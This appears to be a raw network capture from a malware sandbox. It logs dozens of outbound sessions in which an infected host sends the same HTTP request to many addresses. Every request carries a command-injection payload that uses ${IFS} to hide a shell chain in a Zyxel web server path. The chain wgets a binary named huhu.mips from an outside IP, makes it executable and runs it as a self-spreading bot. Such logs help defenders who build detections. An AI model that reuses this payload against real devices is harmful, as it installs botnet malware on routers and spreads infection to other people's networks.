                                                        Feb 2, 2024 06:21:09.929411888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4478192.168.2.1436260109.66.166.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929438114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4479192.168.2.1444978177.187.102.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929471016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4480192.168.2.145527020.152.104.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929522038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4481192.168.2.1445812190.82.236.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929590940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4482192.168.2.1434640191.162.150.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929609060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4483192.168.2.1457934104.215.145.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929644108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4484192.168.2.144072265.230.186.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929672003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4485192.168.2.1459082146.155.147.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929708004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4486192.168.2.1433934195.88.144.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929754019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4487192.168.2.1443572107.205.161.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929790020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4488192.168.2.1439246186.89.3.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929828882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4489192.168.2.14409849.99.3.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929867029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4490192.168.2.1433494161.213.165.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929932117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4491192.168.2.1433718160.184.214.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929969072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4492192.168.2.1459952197.86.209.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930011988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4493192.168.2.143747692.188.114.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930063963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4494192.168.2.1434536111.162.248.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930105925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4495192.168.2.1453622142.202.63.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930150986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4496192.168.2.1451306129.219.8.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930202961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4497192.168.2.145077049.171.51.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930246115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4498192.168.2.1444966159.96.208.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930306911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4499192.168.2.1437718191.247.229.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930366039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4500192.168.2.144816635.76.61.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.930397987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4501192.168.2.144579671.55.23.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.934243917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4502192.168.2.1456200101.34.91.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942049980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4503192.168.2.145763291.228.254.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942092896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4504192.168.2.1450716193.40.154.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942138910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4505192.168.2.143294865.7.239.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942188978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4506192.168.2.143348481.198.13.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942235947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4507192.168.2.144234273.63.160.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942290068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4508192.168.2.1453916106.248.195.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942325115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4509192.168.2.144868214.177.71.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942370892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4510192.168.2.145788249.130.163.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942409039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4511192.168.2.144207218.123.83.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942464113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4512192.168.2.143610299.151.19.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942492008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4513192.168.2.145478639.231.70.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942523956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4514192.168.2.145940868.82.48.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942583084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4515192.168.2.145372287.159.239.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942615986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4516192.168.2.1455134140.253.113.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942687035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4517192.168.2.1449472110.212.253.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942722082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4518192.168.2.144271496.84.23.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942759037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4519192.168.2.1441454126.201.103.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942769051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4520192.168.2.1441238181.223.154.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942820072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4521192.168.2.1453710136.201.183.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942861080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4522192.168.2.145057482.85.154.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942893982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4523192.168.2.143431668.59.49.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942918062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4524192.168.2.144419451.169.255.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.942977905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4525192.168.2.143668275.198.22.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943011999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4526192.168.2.143774477.129.1.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943042040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4527192.168.2.144285468.84.60.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943079948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4528192.168.2.1435958113.220.97.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943134069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4529192.168.2.144842075.47.53.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943164110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4530192.168.2.143535491.202.14.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943223953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4531192.168.2.1436132201.248.51.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943259001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4532192.168.2.1451502133.47.233.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943289042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4533192.168.2.144458424.157.182.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943325043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4534192.168.2.144683037.54.6.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943384886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4535192.168.2.1459738205.12.93.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943432093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4536192.168.2.1439826126.219.42.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943470955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4537192.168.2.1460680201.233.239.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943510056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4538192.168.2.1437542119.63.237.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943557978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4539192.168.2.1438106186.175.244.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.943588018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4540192.168.2.1454270199.101.19.169443
                                                        TimestampBytes transferredDirectionData
